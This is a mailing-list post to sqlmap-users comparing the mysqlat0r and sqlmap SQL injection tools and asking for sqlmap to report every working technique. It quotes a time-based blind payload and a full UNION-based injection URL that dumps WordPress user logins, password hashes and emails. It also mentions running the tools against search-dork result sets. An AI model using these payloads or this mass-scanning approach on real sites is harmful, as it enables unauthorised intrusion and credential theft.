[sqlmap-users] mysqlat0r outperforming sqlmap

[This LittlePiggy]

 sqlmap/1.0-dev (r4351)
 found this 

Place: GETParameter: id    Type: AND/OR time-based blind    Title: MySQL > 
5.0.11 AND time-based blind    Payload: id=155 AND SLEEP(5)---
against 
web application technology: Apache, PHP 5.2.8back-end DBMS: MySQL 5.0.11banner: 
   '5.0.77'

but the exploit was agonizingly slow.
testing each other individual technique --technique=BEUS  at default level and 
risk produced no positives


mysqlat0r  found what it terms, 'method get, with single parameter,  'numerical 
without comments' positive and could quickly catalog dbs and dump full tables
here is an example of it's exploit url
http://127.0.0.1/news/edumacation/salsandvinablals/2011/individittiual09.php?id=-666%20UNION%20ALL%20SELECT%20null,concat(0x585858535441525444554D50585858,ID,0x7C7C7C,user_login,0x7C7C7C,user_pass,0x7C7C7C,user_nicename,0x7C7C7C,user_email,0x7C7C7C,user_url,0x7C7C7C,user_registered,0x7C7C7C,user_activation_key,0x7C7C7C,user_status,0x7C7C7C,display_name,0x7C7C7C,0x585858454E4444554D50585858),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20redridinghood_OSyummy2k11.wp_users%20LIMIT%200,10&

full source for mysqlat0r available here
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r


my previous experience has been that mysqlat0r only is able to exploit what it 
claims to have found about 10% of the time.  


it would be nice if sqlmap would continue to test the other techniques even 
after finding a positive, and show you a list of available positives in 
subsequent passes, as some are much faster, or have better features.  
particularly when processing a dork resultset.

i have seen it ask if i want to continue after a positive, but it doesn't seem 
to actually attempt each of the other techniques, but just skipped to the next 
result set item.  I'll retest that.
i have been able to force it with the BEUST flags, and select the preferred one 
at runtime, but the UI for doing so is a little clumsy.                         
                  
------------------------------------------------------------------------------
Get a FREE DOWNLOAD! and learn more about uberSVN rich system, 
user administration capabilities and model configuration. Take 
the hassle out of deploying and managing Subversion and the 
tools developers use with it. http://p.sf.net/sfu/wandisco-d2d-2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users